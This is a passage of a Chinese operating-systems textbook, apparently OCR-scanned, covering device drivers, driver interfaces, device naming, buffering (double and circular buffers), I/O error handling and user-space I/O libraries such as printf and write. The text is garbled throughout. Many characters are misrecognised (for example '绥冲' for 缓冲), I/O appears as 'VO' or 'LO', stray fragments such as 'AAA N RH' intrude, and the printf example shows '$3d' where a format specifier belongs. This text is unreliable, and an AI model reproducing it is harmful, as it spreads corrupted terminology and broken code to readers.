因而 ， 每 个 连接 到 计算 机 上 的 VO 设备 都 需要 某 些 设备 特定 的 代码 
来 对 其 进行 控制 。 这 样 的 代码 称 为 设备 驱动 程序 (device driver) ， 它 
一 般 由 设备 的 制造 丙 编 写 并 随同 设备 一 起 交付 。 因 为 每 一 个 操作 系统 都 
需要 上 自己 的 驱动 程序 ， 所 以 设备 制造 商 通 第 要 为 耕 干流 行 的 操作 系统 所 
供 驱 动 程序 。 





每 个 设备 驱动 程序 通常 处 理 一 种 类 型 的 设备 ， 或 者 至 多 处 理 一 类 紧 
密 相 关 的 设备 。 例 如 ，SCSI 磁 盘 驱 动 程序 通常 可 以 处 理 不 同 大 小 和 不 同 
速度 的 多 个 SCSI 磁 盘 ， 或 许 还 可 以 处 理 SCSI CD-ROM。 而 另 一 方面 ， 
鼠标 和 游戏 操纵 杆 是 如 此 的 不 同 ， 以 至 于 它们 通常 需要 不 同 的 驱动 程 











序 。 然 而 ， 对 于 一 个 设备 驱动 程序 控制 多 个 不 相关 的 设备 并 不 存在 技术 
上 的 限制 ， 只 是 这 样 做 并 不 是 一 个 好 主意 。 


为 了 访问 设备 的 硬件 〈 意 味 着 访问 设备 控制 器 的 寄存 器 ) ， 设 备 红 
动 程序 通常 必须 是 操作 系统 内 核 的 一 部 分 ， 人 至 少 对 目前 的 体系 结构 是 如 
此 。 实 际 上 ， 有 可 能 构造 运行 在 用 户 空间 的 驱动 程序 ， 使 用 系统 调用 来 
读 写 设备 寄存 器 。 这 一 设计 使 内 核 与 驱动 程序 相隔 离 ， 并 且 使 驱动 程序 
之 间 相 互 隔离 ， 这 样 做 可 以 消除 系统 朋 温 的 一 个 主要 源头 一 有 问题 的 
驱动 程序 以 这 样 或 那样 的 方式 干扰 内 核 。 对 于 建立 高 度 可 徘 的 系统 而 
言 ， 这 绝对 是 正确 的 方向 。MINIX 3 就 是 一 个 这 样 的 系统 ， 其 中 设备 驱 
动 程序 就 作为 用 户 进 程 而 运行 。 然 而 ， 因 为 大 多 数 其 他 呆 面 操作 系统 要 
求 驱 动 程序 运行 在 内 核 中 ， 所 以 我 们 在 这 里 只 考虑 这 样 的 模型 。 























因为 操作 系统 的 设计 者 知道 由 外 人 编写 的 驱动 程序 代码 片断 将 被 安 
装 在 操作 系统 的 内 部 ， 所 以 需要 有 一 个 体系 结构 来 允许 这 样 的 安装 。 这 
意味 着 要 有 一 个 定义 明确 的 模型 ， 规 定 驱 动 程序 做 什么 事情 以 及 如 何 与 
操作 系统 的 其 余部 分 相互 作用 。 设 备 驱 动 程序 通 常 位 于 操作 系统 其 余部 
分 的 下 面 ， 如 图 5-12 所 示 。 
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图 5-12 设备 驱动 程序 的 逻辑 定位 。 实 际 上 ， 驱 动 程序 和 设备 控制 器 
之 间 的 所 有 通信 都 通过 总 线 


操作 系统 通常 将 驱动 程序 归 类 于 少数 的 类 别 之 一 。 最 为 通用 的 类 别 
是 块 设备 (block device) 和 字符 设备 (character device) 。 块 设备 〈 例 





如 磁盘 〉 包含 多 个 可 以 独立 寻 址 的 数据 块 ， 字 符 设 备 〈 例 如 键盘 和 打印 
机 ) 则 生成 或 接收 字符 流 。 


大 多 数 操作 系统 者 定义 了 一 个 所 有 块 设 备 都 必须 文 持 的 标准 接口 ， 
并 且 还 定义 了 夯 一 个 所 有 字符 设备 都 必须 文 持 的 标准 接口 。 这 些 接口 由 
许多 过 程 组 成 ， 操 作 系 统 的 其 余部 分 可 以 调用 它们 让 驱动 程序 工作 。 上 典 
型 的 过 程 是 那些 读 一 个 数据 块 ( 对 块 设备 而 言 ) 或 者 写 一 个 字符 串 (对 
字符 设备 而 言 ) 的 过 程 。 





在 某 些 系统 中 ， 操 作 系统 是 一 个 二 进 制 程序 ， 包 含 需要 编译 到 其 内 
部 的 所 有 驱动 程序 。 这 一 方案 多 年 以 来 对 UNIX 系 统 而 言 是 标准 规范 ， 
因为 UNIX 系 统 主要 由 计算 中 心 运行 ，1/O 设 备 几乎 不 发 生变 化 。 如 果 添 
加 了 一 个 新 设备 ， 系 统管 理 员 只 需 重 新 编译 内 核 ， 将 新 的 驱动 程序 增加 
到 新 的 二 进 制 程序 中 。 





随 着 个 人 计算 机 的 出 现 ， 这 一 模型 不 再 起 作用 ， 因 为 个 人 计算 机 有 
太 多 种 类 的 W/O 设备 。 即 便 拥有 源 代码 或 目标 模块 ， 也 只 有 很 少 的 用 户 
有 能 力 重 新 编译 和 重新 连接 内 核 ， 何 况 他 们 并 不 总 是 拥有 源 代 码 或 目标 
模块 。 为 此 ， 从 MS-DOS 开 始 ， 操 作 系 统 转 问 驱 动 程序 在 执行 期 间 动 态 
地 装载 到 系统 中 的 男 一 个 和 模型。 不同 的 操作 系统 以 不 同 的 方式 处 理 驱 动 
程序 的 装载 工作 。 














设备 驱动 程序 具有 知 干 功能 。 基 明显 的 功能 是 接收 来 目 其 上 方 与 设 


备 无 关 的 软件 所 发 出 的 抽象 的 读 写 请 求 ， 并 且 目 睹 这 些 请 求 被 执行 。 除 
此 之 外 ， 还 有 一 些 其 他 的 功能 必须 执行 。 例 如 ， 如 果 需 要 的 话 ， 驱 动 程 
序 必 须 对 设备 进行 初始 化 。 它 可 能 还 需要 对 电源 需求 和 日 志 事 件 进行 管 
Hi. 








许多 设备 驱动 程序 具有 相似 的 一 般 结构 。 典 型 的 驱动 程序 在 局 动 时 
要 检查 输入 参数 ， 检 杜 输 入 参数 的 目的 是 搞 清 它们 是 舍 是 有 效 的 ， 如 果 
不 是 ， 则 返回 一 个 错误 。 如 果 输 入 参数 是 有 效 的 ， 则 可 能 需要 进行 从 抽 
象 事项 到 具体 事项 的 转换 。 对 磁盘 驱动 程序 来 说 ， 这 可 能 意味 独 将 一 个 
线性 的 磁盘 块 写 转换 成 磁盘 几何 布局 的 磁 兴 、 磁 道 、 司 区 和 柱 面 写 。 





























接着 ， 驱 动 程序 可 能 要 检查 设备 当前 是 否 在 使 用 。 如 果 在 使 用 ， 请 
求 将 被 排 入 队列 以 备 和 后 处 理 。 如 果 设 备 是 空 几 的 ， 驱 动 程序 将 检查 人 硬 
件 状 态 以 了 解 请 求 现在 是 否 能 够 得 到 处 理 。 在 传输 能 够 开始 之 前 ， 可 能 
再 要 接 通 设备 或 者 尼 动 马达 。 一 旦 设备 接 通 并 就 绪 ， 实 际 的 控制 融 可 以 
Wa I 





控制 设备 意味 着 癌 设 备 发 出 一 系列 命令 。 依 据 控制 设备 必须 要 做 的 
工作 ， 了 驱动 程序 处 在 确定 命令 序列 的 地 方 。 驱 动 程序 在 获知 哪些 命令 将 
要 发 出 之 后 ， 它 就 开始 将 它们 写 入 控制 器 的 设备 寄存 器 。 驱 动 程序 在 把 
每 个 命令 写 到 控制 器 之 后 ， 它 可 能 必须 进行 检测 以 了 解 控制 器 是 否 已 经 
接收 命令 并 且 准 备 好 接收 下 一 个 命令 。 这 一 序列 继续 进行 ， 直 到 所 有 命 
令 被 发 出 。 对 于 东 坚 控制 器 ， 可 以 为 其 提供 一 个 在 内 存 中 的 命令 链表 ， 








并 且 告 诉 它 自己 去 读 取 并 处 理 所 有 命令 而 不 需要 操作 系统 提供 进一步 帮 
助 。 


命令 发 出 之 后 ， 会 牵涉 两 种 情形 之 一 。 在 多 数 情况 下 ， 设 备 驱 动 程 
序 必须 等 待 ， 直 到 控制 喜 为 其 做 某 些 事情 ， 所 以 驱动 程序 将 阻 竖 其 目 身 
直到 中 断 到 来 解除 阻 竖 。 然 而 ， 在 另外 一 些 情况 下 ， 操 作 可 以 无 延迟 地 
完成 ， 所 以 驱动 程序 不 需要 阻塞 。 在 字符 模式 下 滚动 屏幕 只 需要 写 少 许 
字 节 到 控制 器 的 寄存 器 中 ， 由 于 不 需要 机 械 运 动 ， 所 以 整个 操作 可 以 在 
儿 纳 秒 内 完成 ， 这 便 是 后 一 种 情形 的 例子 。 
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在 前 一 种 情况 下 ， 阻 塞 的 张 动 程序 可 以 被 中 断 唤 醒 。 在 后 一 种 情况 
下 ， 张 动 程序 根本 就 不 会 休眠 。 无 论 是 哪 一 种 情况 ， 操 作 完 成 之 后 驱动 
程序 都 必须 检查 错误 。 如 果 一 切 顺 利 ， 驱 动 程序 可 能 要 将 数据 (例如 刚 
刚 读 出 的 一 个 磁盘 块 ) 传 送 给 与 设备 无 关 的 软件 。 最 后 ， 它 回调 用 者 返 
回 一 些 用 于 错误 报告 的 状态 信息 。 如 果 还 有 其 他 未 完成 的 请 求 在 排队 ， 
则 选择 一 个 局 动 执行 。 如 果 队 列 中 没有 未 完成 的 请 求 ， 则 该 驱动 程序 将 
阻塞 以 等 竺 下 一 个 请 求 。 

















这 一 简单 的 模型 只 是 现实 的 粗略 近似 ， 许 多 因素 使 相关 的 代码 比 这 
要 复杂 得 多 。 首 先 ， 当 一 个 驱动 程序 正在 运行 时 ， 某 个 IO 设备 可 能 会 
完成 操作 ， 这 样 束 会 中 断 驱 动 程序 。 中 断 可 能 会 导致 一 个 设备 驱动 程序 
运行 ， 事实 上 ， 它 可 能 导致 当前 驱动 程序 运行 。 例 如 ， 当 网 络 驱 动 程序 
正在 处 理 一 个 到 来 的 数据 包 时 ， 为 一 个 数据 包 可 能 到 来 。 因 此 ， 了 驱动 程 






































序 必须 是 重 入 的 (reentrant) ， 这 意味 着 一 个 正在 运行 的 驱动 程序 必须 
预料 到 在 第 一 次 调用 完成 之 前 第 二 次 被 调用 。 





在 一 个 热 可 插 拔 的 系统 中 ， 设 备 可 以 在 计算 机 运行 时 添加 或 删除 。 
因此 ， 当 一 个 驱动 程序 正 忙 于 从 某 设 备 读数 据 时 ， 系 统 可 能 会 通知 它 用 
户 突 然 将 设备 从 系统 中 删除 了 。 在 这 样 的 情况 下 ， 不 但 当前 IO 传送 必 
须 中 止 并 且 不 能 破坏 任何 核心 数据 结构 ， 而 且 任 何 对 这 个 现 已 消失 的 设 
备 的 巧 而 未 诀 的 请 求 都 必须 适当 地 从 系统 中 删除 ， 同 时 还 要 为 它们 的 调 
用 者 提供 这 一 坏 消 恕 。 此 外 ， 未 预料 到 的 新 设备 的 添加 可 能 导致 内 核 重 
新 配置 资源 例如 中 断 请 求 线 ) ， 从 驱动 程序 中 撤除 旧 资 源 ， 并 且 在 适 
当 位 置 填 入 新 资源 。 








驱动 程序 不 允许 进行 系统 调用 ， 但 是 它们 经 常 需 要 与 内 核 的 其 余部 
分 进行 交互 。 对 某 些 内 核 过 程 的 调用 通常 是 允许 的 。 例 如 ， 通 常 需 
用 内 核 过 程 来 分 配 和 释放 人 硬 接线 的 内 存 页 面 作为 缓冲 区 。 还 可 能 需 
他 有 用 的 调用 来 管理 MMU、 定 时 器 、DMA 控 制 器 、 中 断 控 制 器 等 。 








5.3.3 与 设备 无 关 的 VO 软件 


虽然 IO 软件 中 有 一 些 是 设备 特定 的 ， 但 是 其 他 部 分 IO 软件 是 与 设 
备 无 关 的 。 设 备 驱 动 程序 和 与 设备 无 关 的 软件 之 间 的 确切 界限 依赖 于 具 
体系 统 〈 和 设备 ) ， 因 为 对 于 一 些 本 来 应 按照 与 设备 无 关 方 式 实现 的 功 
能 ， 出 于 效率 和 其 他 原因 ， 实 际 上 是 由 驱动 程序 来 实现 的 。 图 5-13 所 示 
的 功能 典型 地 由 与 设备 无 关 的 软件 实现 。 
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图 5-13 与 设备 无 关 的 IO 软件 的 功能 





与 设备 无 天 的 软件 的 基本 功能 是 执行 对 所 有 设备 公共 的 IO 功能 ， 
并 且 向 用 户 层 软 件 提供 一 个 统一 的 接口 。 下 面 我 们 将 详细 介绍 上 述 问 


日 


题 。 
1. 设 备 驱 动 程序 的 统一 接口 


操作 系统 的 一 个 主要 问题 是 如 何 使 万 有 IO 设 备 和 驱动 程序 看 起 来 








或 多 或 少 是 相同 的 。 如 果 磁 盘 、 打 印 机 、 键 盘 等 接口 方式 都 不 相同 ， 那 
么 每 次 在 一 个 新 设备 出 现时 ， 都 必须 为 新 设备 修改 操作 系统 。 必 须 为 每 
个 新 设备 修改 操作 系统 决 不 是 一 个 好 主意 。 





设备 驱动 程序 与 操作 系统 其 余部 分 之 间 的 接口 是 这 一 问题 的 一 个 方 
面 。 图 5-14a 所 示 为 这 样 一 种 情形 :; 每 个 设备 驱动 程序 有 不 同 的 与 操作 
系统 的 接口 。 这 意味 着 ， 可 供 系 统 调用 的 驱动 程序 函数 随 驱 动 程序 的 不 
同 而 不 同 。 这 可 能 还 意味 者 ， 驱 动 程序 所 需要 的 内 核 函 数 也 是 随 驱 动 程 
序 的 不 同 而 不 同 的 。 综 合 起 来 看 ， 这 意味 着 为 每 个 新 的 驱动 程序 提供 接 
口 都 需要 大 量 全 新 的 编程 工作 。 
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图 5-14 弘 没有 标准 的 驱动 程序 接口 ; b) 具 有 标准 的 驱动 程序 接口 


相反 ， 图 5-14b 所 示 为 一 种 不 同 的 设计 ， 在 这 种 设计 中 所 有 驱动 程 
序 具有 相同 的 接口 。 这 样 一 来 ， 倘 硝 符 合 驱 动 程序 接口 ， 那 么 添加 一 个 




















新 的 驱动 程序 就 变 得 容易 多 了 。 这 还 意味 着 驱动 程序 的 编写 人 员 知 道 驱 
动 程序 的 接口 应 该 是 什么 样子 的 。 实 际 上 ， 虽 然 并 非 所 有 的 设备 都 是 缀 
对 一 样 的 ， 但 是 通常 只 存在 少数 设备 类 型 ， 而 它们 的 确 大 体 上 是 相同 
的 。 











这 种 设计 的 工作 方式 如 下 。 对 于 每 一 种 设备 类 型 ， 例 如 磁盘 或 打印 
机 ， 操 作 系 统 定义 一 组 驱动 程序 必须 文 持 的 图 数 。 对 于 磁盘 而 言 ， 这 些 
函数 自然 地 包含 读 和 写 ， 除 此 之 外 还 包含 开局 和 关闭 电源 、 格 式 化 以 及 
其 他 与 磁盘 有 关 的 事情 。 驱 动 程序 通常 包含 一 张 表 格 ， 这 张 表格 具有 针 
对 这 些 函 数 指 癌 驱动 程序 自身 的 指针 。 当 驱动 程序 装载 时 ， 操 作 系 统 记 
录 下 这 张 函 数 指针 表 的 地 址 ， 所 以 当 操作 系统 需要 调用 一 个 函数 时 ， 

可 以 通过 这 张 表格 发 出 间接 调用 。 这 张 函 数 指针 表 定 义 了 驱动 程序 与 操 
作 系 统 其 余部 分 之 间 的 接口 。 给 定 类 型 (磁盘 、 打 印 机 等 的 所 有 设备 
都 必须 服从 这 一 要 求 。 




















如 何 给 IO 设备 命名 是 统一 接口 问题 的 另 一 个 方面 。 与 设备 无 天 的 
软件 要 负责 把 符号 化 的 设备 名 映射 到 适当 的 驱动 程序 上 。 例 如 ， 在 
UNIX 系 统 中 ， 像 /dev/disk0 这 样 的 设备 名 惟一 确定 了 一 个 特殊 文件 的 ji 向 
点 ， 这 个 ji 节点 包含 了 主 设备 号 (major device number) ， 主 设备 号 用 于 
定位 相应 的 驱动 程序 。i 节 点 还 包含 次 设备 号 (minor device number) ， 
次 设备 写作 为 参数 传递 给 驱动 程序 ， 用 来 确定 要 读 或 写 的 具体 单元 。 所 
有 设备 都 具有 主 设 备 号 和 次 设备 号 ， 并 且 所 有 驱动 程序 都 是 通过 使 用 主 




















设备 号 来 选择 驱动 程序 而 得 到 访问 。 


与 设备 命名 密切 相关 的 是 设备 保护 。 系 统 如 何 防止 无 权 访问 设备 的 
用 户 访问 设备 呢 ? 在 UNIX 和 Windows 中 ， 设 备 是 作为 命名 对 象 出 现在 
文件 系统 中 的 ， 这 意味 着 针对 文件 的 常规 的 保护 规则 也 适用 于 IO 设 
备 。 系 统管 理 员 可 以 为 每 一 个 设备 设置 适当 的 访问 权限 。 





2. 绥 冲 





无 论 对 于 块 设备 还 是 对 于 字符 设备 ， 由 于 种 种 原因 ， 绥 冲 也 是 一 个 
重要 的 问题 。 作 为 例子 ， 我 们 考虑 一 个 想 要 从 调制 解 调 器 读 入 数据 的 进 
程 。 让 用 户 进程 执行 read 系 统 调用 并 阻塞 自己 以 等 竺 字符 的 到 来 ， 这 是 
对 到 来 的 字符 进行 处 理 的 一 种 可 能 的 策略 。 每 个 字符 的 到 来 都 将 引起 中 
晰 ， 中 断 服 务 过 程 负责 将 字符 递交 给 用 户 进程 并 且 将 其 解除 阻塞 。 用 户 
进程 把 字符 放 到 某 个 地 方 之 后 可 以 对 另 一 个 字符 执行 读 操 作 并 且 再 次 阻 
塞 。 这 一 模型 如 图 5-15a 所 示 。 
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图 515 台 无 缓冲 的 输入 ; 用 户 空间 中 的 缓冲 ; 中 内 核 空间 中 的 缓冲 
接着 复制 到 用 户 空间 ; AAA N RH 








这 种 处 理 方式 的 问题 在 于 : 对 于 每 个 到 来 的 字符 ， 都 必须 局 动用 户 
进程 。 对 于 短暂 的 数据 流量 让 一 个 进程 运行 许多 次 效率 会 很 低 ， 所 以 这 
不 是 一 个 民 好 的 设计 。 


图 5-15b 所 示 为 一 种 改进 措施 。 此 处 ， 用 户 进程 在 用 户 空 间 中 提供 
了 一 个 包含 n 个 字符 的 缓冲 区 ， 并 且 执 行 读 入 n 个 字符 的 读 操作 。 中 断 服 
务 过 程 负 责 将 到 来 的 字符 放 入 该 缓冲 区 中 下 到 缓冲 区 填 满 ， 然 后 唤醒 用 
户 进程 。 这 一 方案 比 前 一 种 方案 的 效率 要 高 很 多 ， 但 是 它 也 有 一 个 缺 
Rar 当 一 个 字符 到 来 时 ， 如 果 绥 冲 区 被 分 页 而 调 出 了 内 存 会 出 现 什么 问 
题 呢 ? 解决 方法 是 将 缓冲 区 锁定 在 内 存 中 ， 但 是 如 果 许 多 进程 都 在 内 存 
中 锁定 页 面 ， 那 么 可 用 页 面 池 束 会 收缩 并 且 系 统 性 能 将 下 降 。 

















为 一 种 方法 是 在 内 核 空 间 中 创建 一 个 缓冲 区 并 且 让 中 断 处 理 程 序 将 


字符 放 到 这 个 缓冲 区 中 ， 如 图 5-15c 所 示 。 当 该 缓冲 区 被 填 满 的 时 候 ， 

将 包含 用 户 缓冲 区 的 页 面 调 入 内 存 〈 如 果 需 要 的 话 ) ， 并 且 在 一 次 操作 
中 将 内 核 缓冲 区 的 内 容 复制 到 用 户 缓冲 区 中 。 这 一 方法 的 效率 要 高 很 

多 。 





然而 ， 即 使 这 种 方案 也 面临 一 个 问题 ， 正 当 包 含 用 户 缓冲 区 的 页 面 
从 磁盘 调 入 内 存 的 时 候 有 新 的 字符 到 来 ， 这 样 会 发 生 什 么 事情 ? 因为 组 
冲 区 已 满 ， 所 以 没有 地 方 放 置 这 些 新 来 的 字符 。 一 种 解决 问题 的 方法 是 
使 用 第 二 个 内 核 缓 冲 区 。 第 一 个 缓冲 区 填 满 之 后 ， 在 它 被 清空 之 前 ， 使 
用 第 二 个 缓冲 区 ， 如 图 5-15d 所 示 。 当 第 二 个 缓冲 区 填 满 时 ， 就 可 以 将 
它 复 制 给 用 户 ( 假 设 用 户 已 经 请 求 它 ) 。 当 第 二 个 缓冲 区 正在 复制 到 用 
户 空 间 的 时 候 ， 第 一 个 缓冲 区 可 以 用 来 接收 新 的 字符 。 以 这 样 的 方法 ， 
两 个 缓冲 区 轮流 使 用 当 一 个 缓冲 区 正在 个 复制 到 用 户 空间 的 时 候 ， 男 
一 个 缓冲 区 正在 收集 新 的 输入 。 像 这 样 的 缓冲 模式 称 为 双 绥 冲 Cdouble 
buffering) 。 








广泛 使 用 的 另 一 种 形式 的 缓冲 是 循环 缓冲 区 (circular buffer) 。 它 
由 一 个 内 存 区 域 和 两 个 指针 组 成 。 一 个 指针 指向 下 一 个 空 几 的 字 ， 新 的 
数据 可 以 放置 到 此 处 。 男 一 个 指针 指 癌 缓冲 区 中 数据 的 第 一 个 字 ， 该 字 
尚未 被 取 走 。 在 许多 情况 下 ， 当 添加 新 的 数据 时 《例如 刚刚 从 网 络 到 
来 ) ， 便 件 将 推进 第 一 个 指针 ， 而 操作 系统 在 取 走 并 处 理 数据 时 推进 第 
二 个 指针 。 两 个 指针 都 是 环绕 的 ， 当 它们 到 达 顶 部 时 将 回 到 底部 。 











缓冲 对 于 输出 也 是 十 分 重要 的 。 例 如 ， 对 于 没有 缓冲 区 的 调制 解 调 
器 ， 我 们 考虑 采用 图 5-15b 的 模型 输出 是 如 何 实现 的 。 用 户 进程 执行 
write 系统 调用 以 输出 n 个 字符 。 系 统 在 此 刻 有 两 种 选择 。 它 可 以 将 用 户 
阻塞 直到 写 完 所 有 字符 ， 但 是 这 样 做 在 低速 的 电话 线 上 可 能 花费 非常 长 
的 时 间 。 它 也 可 以 立即 将 用 户 释 放 并 且 在 进行 1O 的 同时 让 用 户 做 某 些 
其 他 计算 ， 但 是 这 会 导致 一 个 更 为 糟糕 的 问题 ， 用 户 进程 怎样 知道 输出 
已 经 完成 并 且 可 以 重用 缓冲 区 ? 系统 可 以 生成 一 个 信号 或 软件 中 断 ， 但 
是 这 样 的 编程 方式 是 十 分 困难 的 并 且 被 证 明 是 竞争 条 件 。 对 于 内 核 来 说 
更 好 的 解决 方法 是 将 数据 复制 到 一 个 内 核 缓冲 区 中 ， 与 图 5-15c 相 类 似 
(但 是 是 另 一 个 方向 ) ， 并 且 立 刻 将 调用 者 解除 阻塞 。 现 在 实际 的 IO 
什么 时 候 完 成 都 没有 关系 了 ， 用 户 一 旦 被 解除 阻塞 立刻 就 可 以 自由 地 重 
用 缓冲 区 。 





缓冲 是 一 种 广泛 采用 的 技术 ， 但 是 它 也 有 不 利 的 方面 。 如 有 果 数据 被 
缓冲 太 多 次 ， 性 能 就 会 降低 。 例 如 ， 考 碟 图 5-16 中 的 网 络 。 其 中 ， 一 个 
用 户 执行 了 一 个 系统 调用 同 网 络 写 数据 。 内 核 将 数据 包 复 制 到 一 个 内 核 
绥 冲 区 中 ， 从 而 并 即使 用 户 进 程 得 以 继续 进行 (第 1 步 ) 。 在 此 刻 ， 用 
户 程序 可 以 重用 缓冲 区 。 


用 户 进程 
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网 络 也 
图 5-16 可 能 涉及 多 次 复制 一 个 数据 包 的 网 络 


当 驱 动 程序 被 调用 时 ， 它 将 数据 包 复制 到 控制 器 上 以 供 输出 《第 2 
步 ) 。 它 不 是 将 数据 包 从 内 核 内 存 直接 输出 到 网 线 上 ， 其 原因 是 一 旦 开 
始 一 个 数据 包 的 传输 ， 它 就 必须 以 均匀 的 速度 继续 下 去 ， 驱 动 程序 不 能 
保证 它 能 够 以 均匀 的 速度 访问 内 存 ， 因 为 DMA 通 道 与 其 他 IO 设备 可 能 
正在 窃取 许多 周期 。 不 能 及 时 获得 一 个 字 将 毁坏 数据 包 ， 而 通过 在 控制 
器 内 部 对 数据 包 进 行 缓冲 就 可 以 避免 这 一 问题 。 











当 数 据 包 复 制 到 控制 占 的 内 部 缓冲 区 中 之 后 ， 它 就 会 被 复制 到 网 络 
上 《第 3 步 ) 。 数 据 位 被 发 送 之 后 立刻 就 会 到 达 接 收 器 ， 所 以 在 最 后 一 
位 刚刚 送出 之 后 ， 该 位 就 到 达 了 接收 右 ， 在 这 里 数据 包 在 控制 器 中 家 组 
冲 。 接 下 来 ， 数 据 包 复制 到 接收 费 的 内 核 缓冲 区 中 (第 4 步 ) 。 最 后 ， 





它 被 复制 到 接收 进程 的 缓冲 区 中 《第 5 步 ) 。 然 后 接收 器 通常 会 发 回 一 
个 应 答 。 当 发 送 者 得 到 应 答 时 ， 它 就 可 以 自由 地 发 送 下 一 个 数据 包 。 然 
而 ， 应 该 清楚 的 是 ， 所 有 这 些 复制 操作 都 会 在 很 大 程度 上 降低 传输 速 
率 ， 因 为 所 有 这 些 步 又 必须 有 序 地 发 生 。 


3. 错 误 报 告 





错误 在 IO 上 下 文中 比 在 其 他 上 下 文中 要 常见 得 多 。 当 错误 发 生 
时 ， 操 作 系 统 必须 尽 最 大 努力 对 它们 进行 处 理 。 许 多 错误 是 设备 特定 的 
并 且 必 须 由 适当 的 驱动 程序 来 处 理 ， 但 是 错误 处 理 的 框 染 是 设备 无 关 
的 。 

















一 种 类 型 的 VO 错误 是 编程 错误 ， 这 些 错误 发 生 在 一 个 进程 请 求 某 
些 不 可 能 的 事情 时 ， 例 如 写 一 个 输入 设备 键盘、 扫描 仪 、 鼠 标 等 ) 或 
者 读 一 个 输出 设备 《打印 机 、 绘 图 仪 等 ) 。 其 他 的 错误 包括 提供 了 一 个 
无 效 的 缓冲 区 地 址 或 者 其 他 参数 ， 以 及 指定 了 一 个 无 效 的 设备 《例如 ， 
当 系 统 只 有 两 块 磁盘 时 指定 了 磁盘 3) ， 如 此 等 等 。 在 这 些 错 误 上 采取 
的 行动 是 直截了当 的 : 只 是 将 一 个 错误 代码 报告 返回 给 调用 者 。 


另 一 种 类 型 的 错误 是 实际 的 IO 错误 ， 例 如 ， 试 图 与 一 个 已 经 被 破 
坏 的 磁盘 块 ， 或 者 试图 读 一 个 已 经 天 机 的 便携 式 摄像 机 。 在 这 些 情形 
中 ， 应 该 由 驱动 程序 决定 做 什么 。 如 果 驱 动 程序 不 知道 做 什么 ， 它 应 该 
将 问题 同上 传递 ， 返 回 给 与 设备 无 关 的 软件 。 


软件 要 做 的 事情 取决 于 环境 和 错误 的 本 质 。 如 果 是 一 个 简单 的 读 错 
误 并 且 存 在 一 个 交互 式 的 用 户 可 利用 ， 那 么 它 就 可 以 显示 一 个 对 话 框 来 
询问 用 户 做 什么 。 选 项 可 能 包括 重 试 一 定 的 次 数 ， 忽 略 错误 ， 或 者 杀 死 
调用 进程 。 如 果 没 有 用 户 可 利用 ， 惟 一 的 实际 选择 或 许 就 是 以 一 个 错误 
代码 让 系统 调用 失败 。 

然而 ， 茶 些 错误 不 能 以 这 样 的 方式 来 处 理 。 例 如 ， 关 键 的 数据 络 构 
(如 根 目 录 或 空 几 块 列表 ) 可 能 已 经 被 破坏 ， 在 这 种 情况 下 ， 系 统 也 许 


只 好 显示 一 条 错误 消 妃 并 且 终 止 。 











4. 分 配 与 释放 专用 设备 


东 些 设备 ， 例 如 CD-ROM 刻 录 机 ， 在 任意 给 定 的 时 刻 只 能 由 一 个 进 
程 使 用 。 这 就 要 求 操作 系统 对 设备 使 用 的 请 求 进行 检查 ， 并 且 根 据 被 请 
求 的 设备 是 否 可 用 来 接受 或 者 拒绝 这 些 请 求 。 处 理 这 些 请 求 的 一 种 简单 
方法 是 要 求 进程 在 代表 设备 的 特殊 文件 上 下 接 执行 open 操 作 。 如 采 设 备 
古 不 可 用 的 ， 那 么 open 束 会 失败 。 于 是 就 关闭 这 样 的 一 个 专用 设备 ， 然 
后 将 其 释放 。 


一 种 代 蔡 的 方法 是 对 于 请 求 和 释放 专用 设备 要 有 特殊 的 机 制 。 试 图 
得 到 不 可 用 的 设备 可 以 将 调用 者 阻 珀 ， 而 不 是 让 其 失败 。 阻 窟 的 进程 被 
放 入 一 个 队列 。 述 早 被 请 求 的 设备 会 变 得 可 用 ， 这 时 就 可 以 让 队列 中 的 
第 一 个 进程 得 到 该 设备 并 且 继 续 执 行 。 


5. 与 设备 无 天 的 块 大 小 





不 同 的 磁盘 可 能 具有 不 同 的 鹿 区 大 小 。 应 该 由 与 设备 无 关 的 软件 来 
隐藏 这 一 事实 并 且 回 高 层 提 供 一 个 统一 的 块 大 小 ， 例 如 ， 将 在 干 个 忆 区 
当 作 一 个 馆 辑 块 。 这 样 ， 高 层 软 件 束 只 需 处 理 抽象 的 设备 ， 这 些 抽象 设 
备 全 都 使 用 相同 的 逻辑 块 大 小 ， 与 物理 扇 区 的 大 小 无 关 。 类 似 地 ， 某 些 
字符 设备 〈 如 调制 解 调 需 ) 一 次 一 个 字 贡 地 交付 它们 的 数据 ， 而 其 他 的 
设备 《如 网 络 接口 ) 则 以 较 大 的 单位 交付 它们 的 数据 。 这 些 兰 异 也 可 以 
被 隐藏 起 来 。 











5.3.4 用户 空 间 的 VO 软件 


尽管 大 部 分 LO 软件 都 在 操作 系统 内 部 ， 但 是 仍然 有 一 小 部 分 在 用 
户 空间 ， 包 括 与 用 户 程序 连接 在 一 起 的 库 ， 甚 至 完全 运行 于 内 核 之 外 的 
程序 。 系 统 调用 (包括 1/O 系 统 调用 ) 通 常 由 库 过 程 实现 。 当 一 个 C 程 序 
含 调用 























count=write (fd,buffer,nbytes); 





时 ， 库 过 程 write 将 与 该 程序 连接 在 一 起 ， 并 包含 在 运行 时 出 现在 内 
存 中 的 二 进 制程 序 中 。 所 有 这 些 库 过 程 的 集合 显然 是 O 系 统 的 组 成 部 


分 。 


虽然 这 些 过 程 所 做 的 工作 不 过 是 将 这 些 参数 放 在 合适 的 位 置 供 系统 
调用 使 用 ， 但 是 确 有 其 他 IO 过 程 实际 实现 真正 的 操作 。 输 入 和 输出 的 
格式 化 是 由 库 过 程 完 成 的 。 一 个 例子 是 C 语 言 中 的 printf， 它 以 一 个 格式 
串 和 可 能 的 一 些 变量 作为 输入 ， 构 造 一 个 ASCII 字 符 串 ， 然 后 调用 write 
以 输出 这 个 串 。 作 为 printf 的 一 个 例子 ， 考 虑 语句 














printf("The square of $3d is%6d\n",i,i *i); 





该 语句 格式 化 一 个 字符 串 ， 该 字符 串 是 这 样 组 成 的 :先是 14 个 字符 


的 串 “The square of” 〈 注 意 of 后 有 一 个 空格 ) ， 随 后 是 i 值 作为 3 个 字符 的 
串 ， 然 后 是 4 个 字符 的 串 *is”( 注 意 前 后 各 有 一 个 空格 ) ， 然 后 是 亡 值 作 


为 6 个 字符 的 串 ， 节 后 是 一 个 换行 。 


对 输入 而 言 ， 类 似 过 程 的 一 个 例子 是 scanf， 它 读 取 输入 并 将 其 存放 
到 一 些 变量 中 ， 采 用 与 printf 同 样 语 法 的 格式 串 来 描述 这 些 变量 。 标 准 
的 IO 库 包 含 许 多 涉及 IO 的 过 程 ， 它 们 都 是 作为 用 户 程序 的 一 部 分 运行 
的 。 


